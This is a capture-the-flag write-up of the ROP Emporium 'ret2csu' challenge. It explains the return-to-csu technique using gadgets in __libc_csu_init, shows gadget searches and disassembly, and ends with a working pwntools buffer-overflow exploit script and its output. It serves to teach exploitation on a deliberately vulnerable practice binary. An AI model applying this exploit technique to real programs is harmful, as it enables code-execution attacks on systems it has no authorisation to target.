Select Page
  1. Introduction
  2. Binary information
  3. __libc_csu_init()
  4. CALL issue
  5. Constructing ROP chain
  6. Conclusion


1. Introduction

This ret2csu challenge from ropemporium.com teaches a new ROP technique presented at Black Hat Asia 2018 called return-to-csu. You can download the binary and read the challenge description from here. After reading the white paper, I found this technique very interesting and decided to give it a try. Here we go:


2. Binary information

peilin@PWN:~/ROP_Emporium/ret2csu$ file ret2csu
ret2csu: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=a799b370a24ba0109f1175f31b3058094b5feab5, not stripped

As always, the binary is dynamically linked.

peilin@PWN:~/ROP_Emporium/ret2csu$ gdb -q ret2csu
Reading symbols from ret2csu…(no debugging symbols found)…done.
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial

NX is enabled. That’s why we ROP.


3. __libc_csu_init()

As required, we need to overflow a buffer, overwrite a return address and return to a function called ret2win(). It sounds pretty simple, but the challenge also requires us to return to the ret2win() with its third parameter set to 0xdeadcafebabebeef. OK…

As we know, according to the System V AMD64 ABI calling convention, a function with three parameters should find its first parameter in %rdi, second in %rsi, and third in %rdx. So let’s see if we can find a pop rdx; ret gadget somewhere in the binary. Note, the challenge assumes that ASLR is turned on, so I can’t directly use gadgets from libc since I can’t easily locate them. Luckily, though, PIE is disabled, so we can still locate gadgets in the binary, if there are any.

gdb-peda$ ropsearch “pop rdx” /home/user/ropemporium.com/ret2csu/ret2csu
Searching for ROP gadget: ‘pop rdx’ in: /home/user/ropemporium.com/ret2csu/ret2csu ranges
Not found

OK. Let’s try other tools:

peilin@PWN:~/ropemporium.com/ret2csu$ python ROPgadget.py –binary ./ret2csu | grep rdx
0x0000000000400567 : lea ecx, [rdx] ; and byte ptr [rax], al ; test rax, rax ; je 0x40057b ; call rax
0x000000000040056d : sal byte ptr [rdx + rax – 1], 0xd0 ; add rsp, 8 ; ret

Fine. Now we are in trouble, since none of our automatic ROP gadget search tools have found any useful pop rdx; ret gadgets for us. So, here comes our new return-to-csu technique:

peilin@PWN:~/ropemporium.com/ret2csu$ nm -a ret2csu | grep ” t\| T”
00000000004008b4 t .fini
0000000000600e18 t .fini_array
0000000000400560 t .init
0000000000600e10 t .init_array
0000000000400580 t .plt
00000000004005f0 t .text
00000000004006a0 t __do_global_dtors_aux
0000000000600e18 t __do_global_dtors_aux_fini_array_entry
0000000000600e10 t __frame_dummy_init_array_entry
0000000000600e18 t __init_array_end
0000000000600e10 t __init_array_start
00000000004008b0 T __libc_csu_fini
0000000000400840 T __libc_csu_init
0000000000400620 T _dl_relocate_static_pie
00000000004008b4 T _fini
0000000000400560 T _init
00000000004005f0 T _start
0000000000400630 t deregister_tm_clones
00000000004006d0 t frame_dummy
00000000004006d7 T main
0000000000400714 t pwnme
0000000000400660 t register_tm_clones
00000000004007b1 T ret2win

The command above lists all function symbols inside ret2csu. As we can see there are so many functions, many of which come from “outside the source code” and have been statically linked to the binary, even though our binary is dynamically linked. Take __do_global_dtors_aux_fini_array_entry() for example:

peilin@PWN:/usr/lib/gcc/x86_64-linux-gnu/7$ file crtbeginS.o
crtbeginS.o: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
peilin@PWN:/usr/lib/gcc/x86_64-linux-gnu/7$ nm -a crtbeginS.o | grep __do_global_dtors_aux_fini_array_entry
0000000000000000 t __do_global_dtors_aux_fini_array_entry

It comes from /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o on my machine. Man, we are dealing with longer and longer function names and file directories aren’t we?

The return-to-csu white paper named these statically “attached” code as, well, “attached code”. The idea is, since almost all binaries contain those attached code, if we can find useful gadgets inside those functions, we will no longer need to count on our luck.

We may ask, though: Why tools like ropsearch and ROPgadget.py failed to find us those gadgets if they exist in the attached code? It turns out that those useful gadgets we are going to use look somehow “weird” in appearance that our tools are not smart enough to find them for us. Luckily, though, some super smart guys have already done the job for us. Let’s take a look inside __libc_csu_init():

peilin@PWN:~/ropemporium.com/ret2csu$ gdb -q ret2csu
Reading symbols from ret2csu…(no debugging symbols found)…done.
gdb-peda$ pd __libc_csu_init
Dump of assembler code for function __libc_csu_init:
0x0000000000400840 <+0>: push r15
0x0000000000400842 <+2>: push r14
0x0000000000400844 <+4>: mov r15,rdx
0x0000000000400847 <+7>: push r13
0x0000000000400849 <+9>: push r12
0x000000000040084b <+11>: lea r12,[rip+0x2005be] # 0x600e10
0x0000000000400852 <+18>: push rbp
0x0000000000400853 <+19>: lea rbp,[rip+0x2005be] # 0x600e18
0x000000000040085a <+26>: push rbx
0x000000000040085b <+27>: mov r13d,edi
0x000000000040085e <+30>: mov r14,rsi
0x0000000000400861 <+33>: sub rbp,r12
0x0000000000400864 <+36>: sub rsp,0x8
0x0000000000400868 <+40>: sar rbp,0x3
0x000000000040086c <+44>: call 0x400560 <_init>
0x0000000000400871 <+49>: test rbp,rbp
0x0000000000400874 <+52>: je 0x400896 <__libc_csu_init+86>
0x0000000000400876 <+54>: xor ebx,ebx
0x0000000000400878 <+56>: nop DWORD PTR [rax+rax*1+0x0]
0x0000000000400880 <+64>: mov rdx,r15
0x0000000000400883 <+67>: mov rsi,r14
0x0000000000400886 <+70>: mov edi,r13d
0x0000000000400889 <+73>: call QWORD PTR [r12+rbx*8]
0x000000000040088d <+77>: add rbx,0x1
0x0000000000400891 <+81>: cmp rbp,rbx
0x0000000000400894 <+84>: jne 0x400880 <__libc_csu_init+64>
0x0000000000400896 <+86>: add rsp,0x8
0x000000000040089a <+90>: pop rbx
0x000000000040089b <+91>: pop rbp
0x000000000040089c <+92>: pop r12
0x000000000040089e <+94>: pop r13
0x00000000004008a0 <+96>: pop r14
0x00000000004008a2 <+98>: pop r15
0x00000000004008a4 <+100>: ret
End of assembler dump.

Have you found anything interesting? Spoil alert:

Gadget 1:

0x000000000040089a <+90>: pop rbx
0x000000000040089b <+91>: pop rbp
0x000000000040089c <+92>: pop r12
0x000000000040089e <+94>: pop r13
0x00000000004008a0 <+96>: pop r14
0x00000000004008a2 <+98>: pop r15
0x00000000004008a4 <+100>: ret

Gadget 2:

0x0000000000400880 <+64>: mov rdx,r15
0x0000000000400883 <+67>: mov rsi,r14
0x0000000000400886 <+70>: mov edi,r13d
0x0000000000400889 <+73>: call QWORD PTR [r12+rbx*8]

Particularly, gadget 2 ends with a call instruction, which is untypical for an ROP gadget. It indeed caused me some trouble, as we will see.

In our case, if we first return to gadget 1, popping 0xdeadcafebabebeef into %r15, then return to gadget 2, we will be having 0xdeadcafebabebeef in %rdx at the end of gadget 2, as required. Sounds pretty nice! Let’s get down to work:


4. CALL issue

First we check the return address offset:

gdb-peda$ pattern create 100
‘AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL’
gdb-peda$ r
Starting program: /home/user/ropemporium.com/ret2csu/ret2csu
ret2csu by ROP Emporium

Call ret2win()
The third argument (rdx) must be 0xdeadcafebabebeef

> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL

Program received signal SIGSEGV, Segmentation fault.

OK, so our 100 bytes of input caused a segmentation fault.

Stopped reason: SIGSEGV
0x00000000004007b0 in pwnme ()
gdb-peda$ x/i $pc
=> 0x4007b0 <pwnme+156>: ret
gdb-peda$ x/gx $rsp
0x7fffffffe478: 0x4141464141304141
gdb-peda$ pattern offset 0x4141464141304141
4702116732032008513 found at offset: 40

The offset is 40. We need to put 40 dummy bytes before reaching the return address. Our goal is to put 0xdeadcafebabebeef into %r15, then %rdx, and invoke ret2win(). The %rdx part seems pretty good, but as I said we have a trouble here with the call instruction:

0x0000000000400889 <+73>: call QWORD PTR [r12+rbx*8]

It will first calculate r12+rbx*8, dereference it as a QWORD PTR, then call it. In other words, we want r12+rbx*8 to be a pointer to ret2win(). We can easily find the address of ret2win():

gdb-peda$ p ret2win
$1 = {} 0x4007b1

It is 0x4007b1, but do we have a pointer pointing at 0x4007b1?

gdb-peda$ find 0x4007b1
Searching for ‘0x4007b1’ in: None ranges
Not found

No, we don’t. 🙁

Sadly, in order to put 0xdeadcafebabebeef into %rdx, we do need both gadget 1 and gadget 2, so we must find a way to deal with that call. After staring at these two gadgets as a whole for a while:

0x0000000000400880 <+64>: mov rdx,r15
0x0000000000400883 <+67>: mov rsi,r14
0x0000000000400886 <+70>: mov edi,r13d
0x0000000000400889 <+73>: call QWORD PTR [r12+rbx*8]
0x000000000040088d <+77>: add rbx,0x1
0x0000000000400891 <+81>: cmp rbp,rbx
0x0000000000400894 <+84>: jne 0x400880 <__libc_csu_init+64>
0x0000000000400896 <+86>: add rsp,0x8
0x000000000040089a <+90>: pop rbx
0x000000000040089b <+91>: pop rbp
0x000000000040089c <+92>: pop r12
0x000000000040089e <+94>: pop r13
0x00000000004008a0 <+96>: pop r14
0x00000000004008a2 <+98>: pop r15
0x00000000004008a4 <+100>: ret

I began to realize that maybe we can call some other function and just let it return. Since it’s a call, it will return to the next instruction after call, and after executing these add, cmp, jne and another add instructions, we will once again hit gadget 1, and finally let it ret to our ret2win().

So now we have two more problems:

First, which “placeholder” function should we call, then? Ideally it should have a pointer pointing at it somewhere inside the binary, and ideally it should functionally do nothing, or at least do little—Otherwise it may mess up with our registers.

Second, as shown in the disassembly, we have to pass the cmp rbp,rbx test and make %rbp equals to %rbx, to avoid the jne conditional jump.

Let’s first deal with the first problem. Referencing this great post by w3ndige, I learned that we can use _fini() which perfectly matches our expectations:

gdb-peda$ pd _fini
Dump of assembler code for function _fini:
0x00000000004008b4 <+0>: sub rsp,0x8
0x00000000004008b8 <+4>: add rsp,0x8
0x00000000004008bc <+8>: ret
End of assembler dump.

Beautiful. The functionality of _fini() is as simple as a ret gadget. So do we have a pointer to it?

gdb-peda$ find 0x4008b4 ret2csu
Searching for ‘0x4008b4’ in: ret2csu ranges
Found 2 results, display max 2 items:
ret2csu : 0x400e48 –> 0x4008b4 (<_fini>: sub rsp,0x8)
ret2csu : 0x600e48 –> 0x4008b4 (<_fini>: sub rsp,0x8)

Wonderful. Thank you so much, peda. The nice thing about it is that, as we may guess, _fini() is also an attached code function that comes from /usr/lib/x86_64-linux-gnu/crti.o:

peilin@PWN:/usr/lib/x86_64-linux-gnu$ file crti.o
crti.o: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
peilin@PWN:/usr/lib/x86_64-linux-gnu$ nm -a crti.o | grep _fini
0000000000000000 T _fini

This means this solution may also work elsewhere.

Remember after returning from _fini() we still have to deal with the conditional jump:

0x000000000040088d <+77>: add rbx,0x1
0x0000000000400891 <+81>: cmp rbp,rbx
0x0000000000400894 <+84>: jne 0x400880 <__libc_csu_init+64>
0x0000000000400896 <+86>: add rsp,0x8

Luckily we can control the value for both %rbp and %rbx in gadget 1. We can set %rbp 0x1 larger than %rbx so that after add rbx,0x1 they will be equal and we will be able to fall through the jne, reach gadget 1 again and finally ret to ret2win().


5. Constructing ROP chain

Now we are ready to design our payload. It will be pretty long, since we are actually using gadget 1 twice. Anyway:

         ...lower addresses...

:::::::::::::::::::::::::::::::::::::
|          (40 dummy bytes)         |
+-----------------------------------+
|    address of:      gadget 1      |
+-----------------------------------+
|                 0                 | %rbx = 0
+-----------------------------------+ 
|                 1                 | %rbp = 1
+-----------------------------------+
|    pointer to:       _fini()      | %r12 = 0x600e48, now QWORD PTR [r12+rbx*8] points at _fini()
+-----------------------------------+
|             junk value            | we don’t care about %r13
+-----------------------------------+ 
|             junk value            | we don’t care about %r14
+-----------------------------------+
|         0xdeadcafebabebeef        | %r15 = 0xdeadcafebabebeef
+-----------------------------------+
|    address of:      gadget 2      |
+-----------------------------------+
|             junk value            | “add rsp,0x8”
+-----------------------------------+
|             junk value            | we don’t care about %rbx anymore
+-----------------------------------+
|             junk value            | we don’t care about %rbp anymore
+-----------------------------------+
|             junk value            | we don’t care about %r12 anymore 
+-----------------------------------+
|             junk value            | we don’t care about %r13 
+-----------------------------------+
|             junk value            | we don’t care about %r14
+-----------------------------------+
|             junk value            | we don’t care about %r15 anymore, since 0xdeadcafebabebeef has already been copied into %rdx
+-----------------------------------+
|    address of:      ret2win       | return to win!
+-----------------------------------+

         ...higher addresses...

By the way, now I have good reasons to draw stack layout figures “upside-down”: I need to comment following the sequence those bytes being popped off, and it’s pretty weird if I have to read the comment from the bottom up. Really going to need some mental flexibility, I guess…

Anyways. It’s time to write some Python:

#exp.py
from pwn import *
  
elf = context.binary = ELF('ret2csu')
print("Address of __libc_csu_init(): %#x" %(elf.symbols.__libc_csu_init))
print("Address of ret2win()        : %#x" %(elf.symbols.ret2win))

p = process(elf.path)

pad     = "A" * 40

gadget1 = p64(elf.symbols.__libc_csu_init + 90)

rbx     = p64(0)
rbp     = p64(1)
r12     = p64(0x600e48)
junk    = p64(0)
r15     = p64(0xdeadcafebabebeef)
ret2win = p64(elf.symbols.ret2win)

gadget2 = p64(elf.symbols.__libc_csu_init + 64)

payload =  pad 
payload += gadget1 + rbx + rbp + r12 + (junk * 2) + r15 
payload += gadget2 + (junk * 7)
payload += ret2win

p.recvuntil("\n> ")
p.sendline(payload)

p.interactive()

Let’s try it out:

peilin@PWN:~/ropemporium.com/ret2csu$ python exp.py
[*] ‘/home/user/ropemporium.com/ret2csu/ret2csu’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Address of __libc_csu_init(): 0x400840
Address of ret2win()        : 0x4007b1
[+] Starting local process ‘/home/user/ropemporium.com/ret2csu/ret2csu’: pid 8659
[*] Switching to interactive mode
ROPE{a_placeholder_32byte_flag!}

Nice.

Note that since that I’m still using my Ubuntu 18.04.3 VM, and in fact ret2win() calls system(), we still have that movaps issue. But this time we are lucky. But we can always prepend a ret gadget to our ROP chain, or add 0x1 to the address of  ret2win() to jump over its first push rbp instruction, in order to make the call stack 16-byte aligned. Choosing the latter will actually mess up the stack frame pointer once we exit from our shell, but we don’t really care.


6. Conclusion

So that was ret2csu from ROP Emporium. Learning new techniques is always exciting and I really enjoyed this challenge. Return-to-csu gives us a general way of finding ROP gadgets, which is nice. When searching information about this exploiting technique sometimes I saw people commenting that most of the time you don’t really need to use this technique since real-life binaries are typically large enough to already contain all the gadgets we are going to need. Well, it does make sense to some extent, but I believe that it’s always good to know.

So that’s it! See you next time!